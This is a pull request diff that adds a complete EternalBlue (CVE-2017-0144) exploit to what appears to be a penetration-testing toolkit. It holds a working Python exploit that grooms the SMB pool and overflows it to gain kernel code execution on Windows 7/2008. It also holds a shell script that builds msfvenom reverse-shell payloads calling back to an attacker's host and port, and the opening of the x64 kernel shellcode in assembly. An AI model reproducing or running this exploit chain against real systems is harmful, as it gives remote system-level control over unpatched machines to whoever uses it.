### PR TITLE
CVE-2017-0144 attack vector/exploit added

### DIFF
--- a/src-tauri/exploits/CVE-2017-0144/CVE-2017-0144.py
+++ b/src-tauri/exploits/CVE-2017-0144/CVE-2017-0144.py
@@ -1,0 +1,565 @@
+#!/usr/bin/python
+from impacket import smb
+from struct import pack
+import sys
+import socket
+
+'''
+EternalBlue exploit for Windows 7/2008 by sleepya
+The exploit might FAIL and CRASH a target system (depended on what is overwritten)
+
+Tested on:
+- Windows 7 SP1 x64
+- Windows 2008 R2 SP1 x64
+- Windows 7 SP1 x86
+- Windows 2008 SP1 x64
+- Windows 2008 SP1 x86
+
+Reference:
+- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
+- https://github.com/3ndG4me/AutoBlue-MS17-010
+
+
+Bug detail:
+- For the buffer overflow bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
+- The exploit also use other 2 bugs (see details in BUG.txt)
+  - Send a large transaction with SMB_COM_NT_TRANSACT but processed as SMB_COM_TRANSACTION2 (requires for trigger bug)
+  - Send special session setup command (SMB login command) to allocate big nonpaged pool (use for creating hole)
+######
+
+
+Exploit info:
+- I do not reverse engineer any x86 binary so I do not know about exact offset.
+- The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode.
+  This memory page is executable on Windows 7 and Wndows 2008.
+- The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64.
+- The exploit trick is same as NSA exploit
+- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.
+- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)
+- See the code and comment for exploit detail.
+
+
+srvnet buffer info:
+- srvnet buffer contains a pointer to another struct and MDL about received buffer
+  - Controlling MDL values results in arbitrary write
+  - Controlling pointer to fake struct results in code execution because there is pointer to function
+- A srvnet buffer is created after target receiving first 4 bytes
+  - First 4 bytes contains length of SMB message
+  - The possible srvnet buffer size is "..., 0x9000, 0x11000, 0x21000, ...". srvnet.sys will select the size that big enough.
+- After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message
+- SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()
+- SrvNetCommonReceiveHandler() passes SMB message to SMB handler
+  - If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode
+  - If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called
+  - Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.
+  - Memory leak is ok to be ignored
+
+
+Shellcode note:
+- Shellcode is executed in kernel mode (ring 0) and IRQL is DISPATCH_LEVEL
+- Hijacking system call is common method for getting code execution in Process context (IRQL is PASSIVE_LEVEL)
+  - On Windows x64, System call target address can be modified by writing to IA32_LSTAR MSR (0xc0000082)
+  - IA32_LSTAR MSR scope is core/thread/unique depended on CPU model
+  - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to 
+      get call because it is called on other processors
+  - Shellcode should be aware of double overwriting system call target address when using hijacking system call method
+- Then, using APC in Process context to get code execution in userland (ring 3)
+'''
+
+# Note: see how to craft FEALIST in eternalblue_poc.py
+
+# wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)
+# the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time
+# the size 0x11000 is used in nsa exploit. this size is more reliable.
+NTFEA_SIZE = 0x11000
+# the NTFEA_SIZE above is page size. We need to use most of last page preventing any data at the end of last page
+
+ntfea10000 = pack('<BBH', 0, 0, 0xffdd) + b'A'*0xffde
+
+ntfea11000 = (pack('<BBH', 0, 0, 0) + b'\x00')*600  # with these fea, ntfea size is 0x1c20
+ntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + b'A'*0xf3be  # 0x10fe8 - 0x1c20 - 0xc = 0xf3bc
+
+ntfea1f000 = (pack('<BBH', 0, 0, 0) + b'\x00')*0x2494  # with these fea, ntfea size is 0x1b6f0
+ntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + b'A'*0x48ee  # 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec
+
+ntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 }
+
+'''
+Reverse from srvnet.sys (Win7 x64)
+- SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete():
+
+// for x64
+struct SRVNET_BUFFER {
+	// offset from POOLHDR: 0x10
+	USHORT flag;
+	char pad[2];
+	char unknown0[12];
+	// offset from SRVNET_POOLHDR: 0x20
+	LIST_ENTRY list;
+	// offset from SRVNET_POOLHDR: 0x30
+	char *pnetBuffer;
+	DWORD netbufSize;  // size of netBuffer
+	DWORD ioStatusInfo;  // copy value of IRP.IOStatus.Information
+	// offset from SRVNET_POOLHDR: 0x40
+	MDL *pMdl1; // at offset 0x70
+	DWORD nByteProcessed;
+	DWORD pad3;
+	// offset from SRVNET_POOLHDR: 0x50
+	DWORD nbssSize;  // size of this smb packet (from user)
+	DWORD pad4;
+	QWORD pSrvNetWskStruct;  // want to change to fake struct address
+	// offset from SRVNET_POOLHDR: 0x60
+	MDL *pMdl2;
+	QWORD unknown5;
+	// offset from SRVNET_POOLHDR: 0x70
+	// MDL mdl1;  // for this srvnetBuffer (so its pointer is srvnetBuffer address)
+	// MDL mdl2;
+	// char transportHeader[0x50];  // 0x50 is TRANSPORT_HEADER_SIZE
+	// char netBuffer[0];
+};
+
+struct SRVNET_POOLHDR {
+	DWORD size;
+	char unknown[12];
+	SRVNET_BUFFER hdr;
+};
+'''
+# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing
+# Here is the important fields on x64
+# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.
+#                           The value MUST point to valid (might be fake) struct.
+# - offset 0x70 (MDL)   : MDL for describe receiving SMB request buffer
+#   - 0x70 (VOID*)    : MDL.Next should be NULL
+#   - 0x78 (USHORT)   : MDL.Size should be some value that not too small
+#   - 0x7a (USHORT)   : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)
+#   - 0x80 (VOID*)    : MDL.Process should be NULL
+#   - 0x88 (VOID*)    : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.
+#                         The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).
+#                         
+#
+# To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition.
+# Here is related field for freeing corrupted buffer
+# - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside)
+#                           a corrupted buffer MUST not be reused.
+# - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0
+#                           before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to
+#                           your shellcode as function argument
+# - offset 0x60 (PMDL)  : points to any fake MDL with MDL.Flags 0x20 does not set
+# The last condition is your shellcode MUST return non-negative value. The easiest way to do is "xor eax,eax" before "ret".
+# Here is x64 assembly code for setting nByteProcessed field
+# - fetch SRVNET_BUFFER address from function argument
+#     \x48\x8b\x54\x24\x40  mov rdx, [rsp+0x40]
+# - set nByteProcessed for trigger free after return
+#     \x8b\x4a\x2c          mov ecx, [rdx+0x2c]
+#     \x89\x4a\x38          mov [rdx+0x38], ecx
+
+TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
+TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
+
+fakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2
+fakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2
+fakeSrvNetBufferNsa += b'\x00'*16
+fakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)
+fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0x60, 0x1004, 0)  # _, x86 MDL.Next, .Size, .MdlFlags, .Process
+fakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64)  # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct
+fakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0)  # x64 pmdl2
+# below 0x20 bytes is overwritting MDL
+# NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough
+fakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
+fakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80)  # MDL.Process, MDL.MappedSystemVa
+
+# below is for targeting x64 only (all x86 related values are set to 0)
+# this is for show what fields need to be modified
+fakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2
+fakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0)
+fakeSrvNetBufferX64 += b'\x00'*16
+fakeSrvNetBufferX64 += b'\x00'*16
+fakeSrvNetBufferX64 += b'\x00'*16  # 0x40
+fakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64)  # _, _, pointer to fake struct
+fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0)  # pmdl2
+fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
+fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80)  # MDL.Process, MDL.MappedSystemVa
+
+
+fakeSrvNetBuffer = fakeSrvNetBufferNsa
+#fakeSrvNetBuffer = fakeSrvNetBufferX64
+
+feaList = pack('<I', 0x10000)  # the value of feaList size MUST be >=0x10000 to trigger bug (but must be less than data size)
+feaList += ntfea[NTFEA_SIZE]
+# Note:
+# - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively
+#   - x64: below fea will be copy to offset 0x11000 of overflow buffer
+#   - x86: below fea will be copy to offset 0x10ff8 of overflow buffer
+feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\x00' is for name
+# stop copying by invalid flag (can be any value except 0 and 0x80)
+feaList += pack('<BBH', 0x12, 0x34, 0x5678)
+
+
+# fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler()
+# x64: fake struct is at ffffffff ffd00010
+#   offset 0xa0:  LIST_ENTRY must be valid address. cannot be NULL.
+#   offset 0x08:  set to 3 (DWORD) for invoking ptr to function
+#   offset 0x1d0: KSPIN_LOCK
+#   offset 0x1d8: array of pointer to function
+#
+# code path to get code exection after this struct is controlled
+# SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr
+fake_recv_struct = pack('<QII', 0, 3, 0)
+fake_recv_struct += b'\x00'*16
+fake_recv_struct += pack('<QII', 0, 3, 0)
+fake_recv_struct += (b'\x00'*16)*7
+fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0)  # offset 0xa0 (LIST_ENTRY to itself)
+fake_recv_struct += b'\x00'*16
+fake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0)  # x86 LIST_ENTRY
+fake_recv_struct += (b'\x00'*16)*11
+fake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190)  # fn_ptr array on x86
+fake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0)  # x86 shellcode address
+fake_recv_struct += (b'\x00'*16)*3
+fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0)  # offset 0x1d0: KSPINLOCK, fn_ptr array
+fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1)  # x64 shellcode address - 1 (this value will be increment by one)
+
+
+def getNTStatus(self):
+	return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']
+setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)
+
+def sendEcho(conn, tid, data):
+	pkt = smb.NewSMBPacket()
+	pkt['Tid'] = tid
+
+	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
+	transCommand['Parameters'] = smb.SMBEcho_Parameters()
+	transCommand['Data'] = smb.SMBEcho_Data()
+
+	transCommand['Parameters']['EchoCount'] = 1
+	transCommand['Data']['Data'] = data
+	pkt.addCommand(transCommand)
+
+	conn.sendSMB(pkt)
+	recvPkt = conn.recvSMB()
+	if recvPkt.getNTStatus() == 0:
+		print('got good ECHO response')
+	else:
+		print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
+
+
+def createSessionAllocNonPaged(target, size):
+	# There is a bug in SMB_COM_SESSION_SETUP_ANDX command that allow us to allocate a big nonpaged pool.
+	# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function for storing NativeOS and NativeLanMan.
+	# The NativeOS and NativeLanMan size is caculated from "ByteCount - other_data_size"
+	
+	# Normally a server validate WordCount and ByteCount field in SrvValidateSmb() function. They must not be larger than received data. 
+	# For "NT LM 0.12" dialect, There are 2 possible packet format for SMB_COM_SESSION_SETUP_ANDX command.
+	# - https://msdn.microsoft.com/en-us/library/ee441849.aspx for LM and NTLM authentication
+	#   - GetNtSecurityParameters() function is resposible for extracting data from this packet format
+	# - https://msdn.microsoft.com/en-us/library/cc246328.aspx for NTLMv2 (NTLM SSP) authentication
+	#   - GetExtendSecurityParameters() function is resposible for extracting data from this packet format
+	
+	# These 2 formats have different WordCount (first one is 13 and later is 12). 
+	# Here is logic in BlockingSessionSetupAndX() related to this bug
+	# - check WordCount for both formats (the CAP_EXTENDED_SECURITY must be set for extended security format)
+	# - if FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY are set, process a message as Extend Security request
+	# - else, process a message as NT Security request
+	
+	# So we can send one format but server processes it as another format by controlling FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY.
+	# With this confusion, server read a ByteCount from wrong offset to calculating "NativeOS and NativeLanMan size".
+	# But GetExtendSecurityParameters() checks ByteCount value again.
+	
+	# So the only possible request to use the bug is sending Extended Security request but does not set FLAGS2_EXTENDED_SECURITY.
+	
+	conn = smb.SMB(target, target)
+	_, flags2 = conn.get_flags()
+	# FLAGS2_EXTENDED_SECURITY MUST not be set
+	flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY
+	# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16
+	if size >= 0xffff:
+		flags2 &= ~smb.SMB.FLAGS2_UNICODE
+		reqSize = size // 2
+	else:
+		flags2 |= smb.SMB.FLAGS2_UNICODE
+		reqSize = size
+	conn.set_flags(flags2=flags2)
+	
+	pkt = smb.NewSMBPacket()
+
+	sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
+	sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
+
+	sessionSetup['Parameters']['MaxBufferSize']      = 61440  # can be any value greater than response size
+	sessionSetup['Parameters']['MaxMpxCount']        = 2  # can by any value
+	sessionSetup['Parameters']['VcNumber']           = 2  # any non-zero
+	sessionSetup['Parameters']['SessionKey']         = 0
+	sessionSetup['Parameters']['SecurityBlobLength'] = 0  # this is OEMPasswordLen field in another format. 0 for NULL session
+	# UnicodePasswordLen field is in Reserved for extended security format. 0 for NULL session
+	sessionSetup['Parameters']['Capabilities']       = smb.SMB.CAP_EXTENDED_SECURITY  # can add other flags
+
+	sessionSetup['Data'] = pack('<H', reqSize) + b'\x00'*20
+	pkt.addCommand(sessionSetup)
+
+	conn.sendSMB(pkt)
+	recvPkt = conn.recvSMB()
+	if recvPkt.getNTStatus() == 0:
+		print('SMB1 session setup allocate nonpaged pool success')
+	else:
+		print('SMB1 session setup allocate nonpaged pool failed')
+	return conn
+
+
+# Note: impacket-0.9.15 struct has no ParameterDisplacement
+############# SMB_COM_TRANSACTION2_SECONDARY (0x33)
+class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):
+    structure = (
+        ('TotalParameterCount','<H=0'),
+        ('TotalDataCount','<H'),
+        ('ParameterCount','<H=0'),
+        ('ParameterOffset','<H=0'),
+        ('ParameterDisplacement','<H=0'),
+        ('DataCount','<H'),
+        ('DataOffset','<H'),
+        ('DataDisplacement','<H=0'),
+        ('FID','<H=0'),
+    )
+
+def send_trans2_second(conn, tid, data, displacement):
+	pkt = smb.NewSMBPacket()
+	pkt['Tid'] = tid
+
+	# assume no params
+
+	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
+	transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()
+	transCommand['Data'] = smb.SMBTransaction2Secondary_Data()
+
+	transCommand['Parameters']['TotalParameterCount'] = 0
+	transCommand['Parameters']['TotalDataCount'] = len(data)
+
+	fixedOffset = 32+3+18
+	transCommand['Data']['Pad1'] = ''
+
+	transCommand['Parameters']['ParameterCount'] = 0
+	transCommand['Parameters']['ParameterOffset'] = 0
+
+	if len(data) > 0:
+		pad2Len = (4 - fixedOffset % 4) % 4
+		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
+	else:
+		transCommand['Data']['Pad2'] = ''
+		pad2Len = 0
+
+	transCommand['Parameters']['DataCount'] = len(data)
+	transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len
+	transCommand['Parameters']['DataDisplacement'] = displacement
+
+	transCommand['Data']['Trans_Parameters'] = ''
+	transCommand['Data']['Trans_Data'] = data
+	pkt.addCommand(transCommand)
+
+	conn.sendSMB(pkt)
+
+
+def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
+	# Here is another bug in MS17-010.
+	# To call transaction subcommand, normally a client need to use correct SMB commands as documented in
+	#   https://msdn.microsoft.com/en-us/library/ee441514.aspx
+	# If a transaction message is larger than SMB message (MaxBufferSize in session parameter), a client 
+	#   can use *_SECONDARY command to send transaction message. When sending a transaction completely with
+	#   *_SECONDARY command, a server uses the last command that complete the transaction.
+	# For example:
+	# - if last command is SMB_COM_NT_TRANSACT_SECONDARY, a server executes subcommand as NT_TRANSACT_*.
+	# - if last command is SMB_COM_TRANSACTION2_SECONDARY, a server executes subcommand as TRANS2_*.
+	#
+	# Without MS17-010 patch, a client can mix a transaction command if TID, PID, UID, MID are the same.
+	# For example:
+	# - a client start transaction with SMB_COM_NT_TRANSACT command
+	# - a client send more transaction data with SMB_COM_NT_TRANSACT_SECONDARY and SMB_COM_TRANSACTION2_SECONDARY
+	# - a client sned last transactino data with SMB_COM_TRANSACTION2_SECONDARY
+	# - a server executes transaction subcommand as TRANS2_* (first 2 bytes of Setup field)
+	
+	# From https://msdn.microsoft.com/en-us/library/ee442192.aspx, a maximum data size for sending a transaction 
+	#   with SMB_COM_TRANSACTION2 is 65535 because TotalDataCount field is USHORT
+	# While a maximum data size for sending a transaction with SMB_COM_NT_TRANSACT is >65536 because TotalDataCount
+	#   field is ULONG (see https://msdn.microsoft.com/en-us/library/ee441534.aspx).
+	# Note: a server limit SetupCount+TotalParameterCount+TotalDataCount to 0x10400 (in SrvAllocationTransaction)
+	
+	pkt = smb.NewSMBPacket()
+	pkt['Tid'] = tid
+
+	command = pack('<H', setup)
+	
+	# Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.
+	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
+	transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()
+	transCommand['Parameters']['MaxSetupCount'] = 1
+	transCommand['Parameters']['MaxParameterCount'] = len(param)
+	transCommand['Parameters']['MaxDataCount'] = 0
+	transCommand['Data'] = smb.SMBTransaction2_Data()
+
+	transCommand['Parameters']['Setup'] = command
+	transCommand['Parameters']['TotalParameterCount'] = len(param)
+	transCommand['Parameters']['TotalDataCount'] = len(data)
+
+	fixedOffset = 32+3+38 + len(command)
+	if len(param) > 0:
+		padLen = (4 - fixedOffset % 4 ) % 4
+		padBytes = '\xFF' * padLen
+		transCommand['Data']['Pad1'] = padBytes
+	else:
+		transCommand['Data']['Pad1'] = ''
+		padLen = 0
+
+	transCommand['Parameters']['ParameterCount'] = len(param)
+	transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen
+
+	if len(data) > 0:
+		pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4
+		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
+	else:
+		transCommand['Data']['Pad2'] = ''
+		pad2Len = 0
+
+	transCommand['Parameters']['DataCount'] = firstDataFragmentSize
+	transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len
+
+	transCommand['Data']['Trans_Parameters'] = param
+	transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]
+	pkt.addCommand(transCommand)
+
+	conn.sendSMB(pkt)
+	conn.recvSMB() # must be success
+	
+	# Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
+	i = firstDataFragmentSize
+	while i < len(data):
+		# limit data to 4096 bytes per SMB message because this size can be used for all Windows version
+		sendSize = min(4096, len(data) - i)
+		if len(data) - i <= 4096:
+			if not sendLastChunk:
+				break
+		send_trans2_second(conn, tid, data[i:i+sendSize], i)
+		i += sendSize
+	
+	if sendLastChunk:
+		conn.recvSMB()
+	return i
+
+	
+# connect to target and send a large nbss size with data 0x80 bytes
+# this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target
+# a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten)
+def createConnectionWithBigSMBFirst80(target):
+	# https://msdn.microsoft.com/en-us/library/cc246496.aspx
+	# Above link is about SMB2, but the important here is first 4 bytes.
+	# If using wireshark, you will see the StreamProtocolLength is NBSS length.
+	# The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.
+	#
+	# After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.
+	# srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.
+	# Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.
+	sk = socket.create_connection((target, 445))
+	# For this exploit, use size is 0x11000
+	pkt = b'\x00' + b'\x00' + pack('>H', 0xfff7)
+	# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.
+	# Also this is invalid SMB2 message.
+	# I believe NSA exploit use SMB2 for hiding alert from IDS
+	#pkt += '\xfeSMB' # smb2
+	# it can be anything even it is invalid
+	pkt += b'BAAD' # can be any
+	pkt += b'\x00'*0x7c
+	sk.send(pkt)
+	return sk
+
+
+def exploit(target, shellcode, numGroomConn):
+	# force using smb.SMB for SMB1
+	conn = smb.SMB(target, target)
+
+	# can use conn.login() for ntlmv2
+	conn.login_standard('', '')
+	server_os = conn.get_server_os()
+	print('Target OS: '+server_os)
+	if not (server_os.startswith("Windows 7 ") or (server_os.startswith("Windows Server ") and ' 2008 ' in server_os) or server_os.startswith("Windows Vista")):
+		print('This exploit does not support this target')
+		sys.exit()
+	
+
+	tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
+	
+	# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
+	# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
+	progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, 2000, False)
+	# we have to know what size of NtFeaList will be created when last fragment is sent
+
+	# make sure server recv all payload before starting allocate big NonPaged
+	#sendEcho(conn, tid, 'a'*12)
+
+	# create buffer size NTFEA_SIZE-0x1000 at server
+	# this buffer MUST NOT be big enough for overflown buffer
+	allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)
+	
+	# groom nonpaged pool
+	# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
+	srvnetConn = []
+	for i in range(numGroomConn):
+		sk = createConnectionWithBigSMBFirst80(target)
+		srvnetConn.append(sk)
+
+	# create buffer size NTFEA_SIZE at server
+	# this buffer will be replaced by overflown buffer
+	holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)
+	# disconnect allocConn to free buffer
+	# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
+	allocConn.get_socket().close()
+
+	# hope one of srvnetConn is next to holeConn
+	for i in range(5):
+		sk = createConnectionWithBigSMBFirst80(target)
+		srvnetConn.append(sk)
+		
+	# send echo again, all new 5 srvnet buffers should be created
+	#sendEcho(conn, tid, 'a'*12)
+	
+	# remove holeConn to create hole for fea buffer
+	holeConn.get_socket().close()
+
+	# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
+	send_trans2_second(conn, tid, feaList[progress:], progress)
+	recvPkt = conn.recvSMB()
+	retStatus = recvPkt.getNTStatus()
+	# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag
+	if retStatus == 0xc000000d:
+		print('good response status: INVALID_PARAMETER')
+	else:
+		print('bad response status: 0x{:08x}'.format(retStatus))
+		
+
+	# one of srvnetConn struct header should be modified
+	# a corrupted buffer will write recv data in designed memory address
+	for sk in srvnetConn:
+		sk.send(fake_recv_struct + shellcode)
+
+	# execute shellcode by closing srvnet connection
+	for sk in srvnetConn:
+		sk.close()
+
+	# nicely close connection (no need for exploit)
+	conn.disconnect_tree(tid)
+	conn.logoff()
+	conn.get_socket().close()
+
+
+if len(sys.argv) < 3:
+	print("{} <ip> <shellcode_file> [numGroomConn]".format(sys.argv[0]))
+	sys.exit(1)
+
+TARGET=sys.argv[1]
+numGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])
+
+fp = open(sys.argv[2], 'rb')
+sc = fp.read()
+fp.close()
+
+print('shellcode size: {:d}'.format(len(sc)))
+print('numGroomConn: {:d}'.format(numGroomConn))
+
+exploit(TARGET, sc, numGroomConn)
+print('done - check your netcat listener for reverse shell')

--- a/src-tauri/exploits/CVE-2017-0144/Shellcode/create_shell.sh
+++ b/src-tauri/exploits/CVE-2017-0144/Shellcode/create_shell.sh
@@ -1,0 +1,21 @@
+#!/bin/bash
+set -e
+
+host_IP=$1
+Listen_port=$2
+
+nasm -f bin /usr/share/ddt/CVE-2017-0144/Shellcode/eternalblue_kshellcode_x64.asm -o /home/kali/Deakin-Detonator-Toolkit/sc_x64_kernel.bin
+nasm -f bin /usr/share/ddt/CVE-2017-0144/Shellcode/eternalblue_kshellcode_x86.asm -o /home/kali/Deakin-Detonator-Toolkit/sc_x86_kernel.bin
+
+msfvenom -p windows/x64/shell_reverse_tcp -f raw -o /home/kali/Deakin-Detonator-Toolkit/sc_x64_msf.bin EXITFUNC=thread LHOST=$1 LPORT=$2
+msfvenom -p windows/shell_reverse_tcp -f raw -o /home/kali/Deakin-Detonator-Toolkit/sc_x86_msf.bin EXITFUNC=thread LHOST=$1 LPORT=$2
+        
+cat /home/kali/Deakin-Detonator-Toolkit/sc_x64_kernel.bin /home/kali/Deakin-Detonator-Toolkit/sc_x64_msf.bin > /home/kali/Deakin-Detonator-Toolkit/sc_x64.bin
+cat /home/kali/Deakin-Detonator-Toolkit/sc_x86_kernel.bin /home/kali/Deakin-Detonator-Toolkit/sc_x86_msf.bin > /home/kali/Deakin-Detonator-Toolkit/sc_x86.bin
+
+echo IP: $1
+echo port: $2
+
+exit 0
+
+

--- a/src-tauri/exploits/CVE-2017-0144/Shellcode/eternalblue_kshellcode_x64.asm
+++ b/src-tauri/exploits/CVE-2017-0144/Shellcode/eternalblue_kshellcode_x64.asm
@@ -1,0 +1,622 @@
+;
+; Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
+; The shellcode is written for eternalblue exploit: eternalblue_exploit7.py and eternalblue_exploit8.py
+;
+;
+; Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
+;
+;
+; Note:
+; - The userland shellcode is run in a new thread of system process.
+;     If userland shellcode causes any exception, the system process get killed.
+; - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to 
+;     get call because system call is called on other processors.
+; - The shellcode do not allocate shadow stack if possible for minimal shellcode size.
+;     It is ok because some Windows function does not require shadow stack.
+; - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
+; - The userland payload MUST be appened to this shellcode.
+;
+; Reference:
+; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
+; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
+
+BITS 64
+ORG 0
+
+
+PSGETCURRENTPROCESS_HASH    EQU    0xdbf47c78
+PSGETPROCESSID_HASH    EQU    0x170114e1
+PSGETPROCESSIMAGEFILENAME_HASH    EQU    0x77645f3f
+LSASS_EXE_HASH    EQU    0xc1fa6a5a
+SPOOLSV_EXE_HASH    EQU    0x3ee083d8
+ZWALLOCATEVIRTUALMEMORY_HASH    EQU    0x576e99ea
+PSGETTHREADTEB_HASH    EQU    0xcef84c3e
+KEINITIALIZEAPC_HASH    EQU    0x6d195cc4
+KEINSERTQUEUEAPC_HASH    EQU    0xafcc4634
+PSGETPROCESSPEB_HASH    EQU    0xb818b848
+CREATETHREAD_HASH    EQU    0x835e515e
+
+
+
+DATA_PEB_ADDR_OFFSET        EQU -0x10
+DATA_QUEUEING_KAPC_OFFSET   EQU -0x8
